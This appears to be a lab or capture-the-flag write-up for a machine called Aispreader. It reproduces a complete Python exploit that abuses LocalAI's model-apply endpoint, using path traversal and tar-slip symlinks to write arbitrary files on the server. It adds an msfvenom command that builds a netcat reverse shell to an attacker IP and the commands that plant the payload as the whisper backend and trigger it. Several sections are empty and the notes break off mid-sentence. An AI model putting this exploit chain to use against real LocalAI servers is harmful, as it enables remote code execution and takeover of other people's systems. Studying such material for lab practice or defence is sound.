Aispreader (Expert)
Post

Aispreader (Expert)

Host entries
1
10.0.14.34

Content

Reconnaissance

Initial reconnaissance for TCP ports

1

Services and Versions running:

1

Exploitation

https://huntr.com/bounties/752d2376-2d9a-4e17-b462-3c267f9dd229

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
import json, time, tarfile

from io import BytesIO
from random import randbytes, randint
from pathlib import Path
from argparse import ArgumentParser
from requests import Session

from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process, Queue


# small template for models that will be served to localai:
model_tmpl = """
name: {}
files:
  - filename: {}
    uri: {}
"""


g_queue = Queue() # used for some janky ipc with http server

class HttpHandler(BaseHTTPRequestHandler):
    def log_message(self, format, *args):
        pass

    def do_GET(self):
        self.send_response(200)
        self.send_header('content-type', 'application/text')
        self.end_headers()
        rsp = g_queue.get()
        print(f"response to {self.path}:", rsp[:64], "...")
        self.wfile.write(rsp)

def run_httpd(lhost, lport):
    print(f"running httpserver on {lhost}:{lport}")
    httpd = HTTPServer((lhost, lport), HttpHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    parser = ArgumentParser()
    parser.add_argument("--lhost", default="localhost")
    parser.add_argument("--url", default="http://localhost:8080")
    parser.add_argument("--local_path", default="poc.txt")
    parser.add_argument("--remote_path", default="/tmp/poc.txt")
    args = parser.parse_args()

    remote_path = Path(args.remote_path)


    # --lhost is attackers host as seen from the localai, so if localai
    # runs in docker use 172.17.0.1 (or something like that depending on
    # your system), if running locally just use localhost:
    lport = randint(50000, 60000)
    attacker_url = f"http://{args.lhost}:{lport}"

    # run http service that will serve the files:
    proc = Process(target=run_httpd, args=(args.lhost, lport))
    proc.start()
    time.sleep(1)

    with Session() as s:
        # use another vulnerability to delete the target first, because our "arbitrary"
        # write can not overwrite files, just write a new file:
        m_name = "m_" + randbytes(4).hex()
        g_queue.put(f"name: {m_name}\n".encode())
        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
            "overrides" : {
                "mmproj" : f"../../../../../../../../../../{args.remote_path}",
            }
        })
        rsp = s.post(f"{args.url}/models/delete/{m_name}")

        # create a model from a config and let it download the files. If the file is an archive
        # it will automatically uncompress the contents:
        m_name = "m_" + randbytes(4).hex()
        model_yaml = model_tmpl.format(m_name, f"{m_name}.tar", f"{attacker_url}/{m_name}.tar")

        g_queue.put(model_yaml.encode())
        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
        })

        # create a tar file with a symlink pointing to the directory of `remote_path`.
        redirect = randbytes(4).hex()
        fake_tar = BytesIO()
        with tarfile.open(fileobj=fake_tar, mode="w") as tar:
            info = tarfile.TarInfo(redirect)
            info.type = tarfile.SYMTYPE
            info.linkname = str(remote_path.parent)
            tar.addfile(info)

        g_queue.put(fake_tar.getvalue())

        # do another tarslip, but this time save the .tar file to symlink'ed directory
        # so that the contents of this new tar are extracted there. this will allow to
        # write a file with the same attributes as `args.local_path`
        m_name = "m_" + randbytes(4).hex()
        model_yaml = model_tmpl.format(m_name, f"{redirect}/{redirect}.tar", f"{attacker_url}/{m_name}.tar")
        g_queue.put(model_yaml.encode())

        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
        })

        fake_tar = BytesIO()
        with tarfile.open(fileobj=fake_tar, mode="w") as tar:
            tar.add(args.local_path, arcname=str(remote_path.name))

        g_queue.put(fake_tar.getvalue())

        time.sleep(1)
        input("press enter to continue...")

    proc.kill()

1
msfvenom -p linux/x64/exec CMD='nc -e /bin/bash 10.10.5.122 1234' -f elf-so > pwn
1
python exploit.py --url='http://10.0.14.34:8080' --lhost='10.10.5.122' --remote_path='/tmp/localai/backend_data/backend-assets/grpc/whisper' --local_path='pwn'
1
curl https://upload.wikimedia.org/wikipedia/commons/1/1f/George_W_Bush_Columbia_FINAL.ogg -o test.ogg
1
curl http://10.0.14.34:8080/models/apply -H 'Content-Type: application/json' -d '{"id":"whisper-base-en-q5_1"}'
1
curl http://10.0.14.34:8080/v1/audio/transcriptions -H 'Content-Type: multipart/form-data' -F file='@test.ogg' -F model='whisper-base-en-q5_1'
1

Privilege Escalation

Post Exploitation

Credentials

Notes

  • Chisel have different configurations, this time we use a Forward SOCKS Proxy, which is a bind shell, that is not neccessarily the easiest way to forward the remote port, but is a new way to consider in case that a reverse shell is not possible.
  • Always look for exploits, analyze them and check if something can be useful to exploit the machine.
  • Chisel has some

References